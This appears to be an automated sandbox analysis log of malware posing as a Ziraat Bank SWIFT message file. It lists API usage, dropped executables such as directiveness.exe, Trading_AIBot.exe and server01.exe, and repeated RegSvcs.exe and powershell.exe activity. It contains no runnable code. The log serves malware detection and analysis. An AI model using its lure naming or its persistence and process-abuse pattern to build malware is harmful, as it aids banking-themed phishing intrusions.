Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_00108111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00108111
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000BEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_000BEB42
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00658111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00658111
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0060EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0060EB42

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000C123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000C123A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
